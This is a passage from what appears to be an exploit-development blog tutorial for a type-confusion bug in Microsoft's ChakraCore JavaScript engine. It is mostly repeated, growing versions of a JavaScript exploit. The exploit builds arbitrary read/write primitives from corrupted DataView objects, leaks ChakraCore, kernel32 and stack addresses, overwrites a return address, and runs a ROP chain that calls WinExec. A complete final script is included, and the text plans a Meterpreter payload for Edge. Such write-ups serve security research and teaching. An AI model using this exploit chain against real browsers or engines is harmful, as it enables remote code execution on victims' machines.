    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Loop
    while (counter < 0x10000)
    {
        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Print update
        print("[+] Stack address 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));

        // Increment the counter
        counter += 0x8;
    }
}

main();

As we can see above, we are going to scan the stack, up through 0x10000 bytes (which is just a random arbitrary value). It is worth noting that the stack grows “downwards” on x64-based Windows systems. Since we have leaked the stack limit, this is technically the “lowest” address our stack can grow to. The stack base is known as the upper limit, to where the stack can also not grow past. This can be examined more thoroughly by referencing our !teb command output previously seen.

For instance, let’s say our stack starts at the address 0xf7056ff000 (based on the above image). We can see that this address is within the bounds of the stack base and stack limit. If we were to perform a push rax instruction to place RAX onto the stack, the stack address would then “grow” to 0xf7056feff8. The same concept can be applied to function prologues, which allocate stack space by performing sub rsp, 0xSIZE. Since we leaked the “lowest” the stack can be, we will scan “upwards” by adding 0x8 to our counter after each iteration.

Let’s now run our updated exploit.js in a cmd.exe session without any debugger attached, and output this to a file.

As we can see, we received an access denied. This actually has nothing to do with our exploit, except that we attempted to read memory that is invalid as a result of our loop. This is because we set an arbitrary value of 0x10000 bytes to read - but all of this memory may not be resident at the time of execution. This is no worry, because if we open up our results.txt file, where our output went, we can see we have plenty to work with here.

Scrolling down a bit in our results, we can see we have finally reached the location on the stack with return addresses and other data.

What we do next is a “trial-and-error” approach, where we take one of the 0x7fff addresses, which we know is a standard user-mode address that is from a loaded module backed by disk (e.g. ntdll.dll) and we take it, disassemble it in WinDbg to determine if it is a return address, and attempt to use it.

I have already gone through this process, but will still show you how I would go about it. For instance, after paring results.txt I located the address 0x7fff25c78b0 on the stack. Again, this could be another address with 0x7fff that ends in a ret.

After seeing this address, we need to find out if this is an actual ret instruction. To do this, we can execute our exploit within WinDbg and set a break-on-load breakpoint for chakracore.dll. This will tell WinDbg to break when chakracore.dll is loaded into the process space.

After chakracore.dll is loaded, we can disassemble our memory address and as we can see - this is a valid ret address.

What this means is at some point during our code execution, the function chakracore!JsRun is called. When this function is called, chakracore!JsRun+0x40 (the return address) is pushed onto the stack. When chakracore!JsRun is done executing, it will return to this instruction. What we will want to do is first execute a proof-of-concept that will overwrite this return address with 0x4141414141414141. This means when chakracore!JsRun is done executing (which should happen during the lifetime of our exploit running), it will try to load its return address into the instruction pointer - which will have been overwritten with 0x4141414141414141. This will give us control of the RIP register! Once more, to reiterate, the reason why we can overwrite this return address is because at this point in the exploit (when we scan the stack), chakracore!JsRun’s return address is on the stack. This means between the time our exploit is done executing, as the JavaScript will have been run (our exploit.js), chakracore!JsRun will have to return execution to the function which called it (the caller). When this happens, we will have corrupted the return address to hijack control-flow into our eventual ROP chain.

Now we have a target address, which is located 0x1768bc0 bytes away from chakrecore.dll.

With this in mind, we can update our exploit.js to the following, which should give us control of RIP.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // When execution reaches here, stackLeak+counter contains the stack address with the return address we want to overwrite
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
}

main();

Let’s run this updated script in the debugger directly, without any breakpoints.

After running our exploit, we can see we encounter an access violation! We can see a ret instruction is attempting to be executed, which is attempting to return execution to the ret address we have overwritten! This is likely a result of our JsRun function invoking a function or functions which eventually return execution to the ret address of our JsRun function which we overwrote. If we take a look at the stack, we can see the culprit of our access violation - ChakraCore is trying to return into the address 0x4141414141414141 - an address which we control! This means we have successfully controlled program execution and RIP!

All there is now to do is write a ROP chain to the stack and overwrite RIP with our first ROP gadget, which will call WinExec to spawn calc.exe

Code Execution

With complete stack control via our arbitrary write primitive plus stack leak, and with control-flow hijacking available to us via a return address overwrite - we now have the ability to induce a ROP payload. This is, of course, due to the advent of DEP. Since we know where the stack is at, we can use our first ROP gadget in order to overwrite the return address we previously overwrote with 0x4141414141414141. We can use the rp++ utility in order to parse the .text section of chakracore.dll for any useful ROP gadgets. Our goal (for this part of the blog series) will be to invoke WinExec. Note that this won’t be possible in Microsoft Edge (which we will exploit in part three) due to the mitigation of no child processes in Edge. We will opt for a Meterpreter payload for our Edge exploit, which comes in the form of a reflective DLL to avoid spawning a new process. However, since CharkaCore doesn’t have these constraints, let’s parse chakracore.dll for ROP gadgets and then take a look at the WinExec prototype.

Let’s use the following rp++ command: rp-win-x64.exe -f C:\PATH\TO\ChakraCore\Build\VcBuild\x64_debug\ChakraCore.dll -r > C:\PATH\WHERE\YOU\WANT\TO\OUTPUT\gadgets.txt:

ChakraCore is a very large code base, so gadgets.txt will be decently big. This is also why the rp++ command takes a while to parse chakracore.dll. Taking a look at gadgets.txt, we can see our ROP gadgets.

Moving on, let’s take a look at the prototype of WinExec.

As we can see above, WinExec takes two parameters. Because of the __fastcall calling convention, the first parameter needs to be stored in RCX and the second parameter needs to be in RDX.

Our first parameter, lpCmdLine, needs to be a string which contains the contents of calc. At a deeper level, we need to find a memory address and use an arbitrary write primitive to store the contents there. In other works, lpCmdLine needs to be a pointer to the string calc.

Looking at our gadgets.txt file, let’s look for some ROP gadgets to help us achieve this. Within gadgets.txt, we find three useful ROP gadgets.

0x18003e876: pop rax ; ret ; \x26\x58\xc3 (1 found)
0x18003e6c6: pop rcx ; ret ; \x26\x59\xc3 (1 found)
0x1800d7ff7: mov qword [rcx], rax ; ret ; \x48\x89\x01\xc3 (1 found)

Here is how this will look in terms of our ROP chain:

pop rax ; ret
<0x636c6163> (calc in hex is placed into RAX)

pop rcx ; ret
<pointer to store calc> (pointer is placed into RCX)

mov qword [rcx], rax ; ret (fill pointer with calc)

Where we have currently overwritten our return address with a value of 0x4141414141414141, we will place our first ROP gadget of pop rax ; ret there to begin our ROP chain. We will then write the rest of our gadgets down the rest of the stack, where our ROP payload will be executed.

Our previous three ROP gagdets will place the string calc into RAX, the pointer where we want to write this string into RCX, and then a gadget used to actually update the contents of this pointer with the string.

Let’s update our exploit.js script with these ROP gadgets (note that rp++ can’t compensate for ASLR, and essentially computes the offset from the base of chakracore.dll. For example, the pop rax gadget is shown to be at 0x18003e876. What this means is that we can actually find this gadget at chakracore_base + 0x3e876.)

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;

}

main();

You’ll notice the address we are placing in RCX, via pop rcx, is “an empty address in .data of chakracore.dll”. The .data section of any PE is generally readable and writable. This gives us the proper permissions needed to write calc into the pointer. To find this address, we can look at the .data section of chakracore.dll in WinDbg with the !dh command.

Let’s open our exploit.js in WinDbg again via ch.exe and WinDbg and set a breakpoint on our first ROP gadget (located at chakracore_base + 0x3e876) to step through execution.

Looking at the stack, we can see we are currently executing our ROP chain.

Our first ROP gadget, pop rax, will place calc (in hex representation) into the RAX register.

After execution, we can see the ret from our ROP gadget takes us right to our next gadget - pop rcx, which will place the empty .data pointer from chakracore.dll into RCX.

This brings us to our next ROP gadget, the mov qword ptr [rcx], rax ; ret gadget.

After execution of the ROP gadget, we can see the .data pointer now contains the contents of calc - meaning we now have a pointer we can place in RCX (it technically is already in RCX) as the lpCmdLine parameter.

Now that the first parameter is done - we only have two more steps left. The first is the second parameter, uCmdShow (which just needs to be set to 0). The last gadget will pop the address of kernel32!WinExec. Here is how this part of the ROP chain will look.

pop rdx ; ret
<0 as the second parameter> (placed into RDX)

pop rax ; ret
<WinExec address> (placed into RAX)

jmp rax (call kernel32!WinExec)

The above gadgets will fill RDX with our last parameter, and then place WinExec into RAX. Here is how we update our final script.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
}

main();

Before execution, we can find the address of kernel32!WinExec by computing the offset in WinDbg.

Let’s again run our exploit in WinDbg and set a breakpoint on the pop rdx ROP gadget (located at chakracore_base + 0x40802)

After the pop rdx gadget is hit, we can see 0 is placed in RDX.

Execution then redirects to the pop rax gadget.

We then place kernel32!WinExec into RAX and execute the jmp rax gadget to jump into the WinExec function call. We can also see our parameters are correct (RCX points to calc and RDX is 0.

We can now see everything is in order. Let’s close our of WinDbg and execute our final exploit without any debugger. The final code can be seen below.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax
    counter+=0x8;
}

main();

As we can see, we achieved code execution via type confusion while bypassing ASLR, DEP, and CFG!

Conclusion

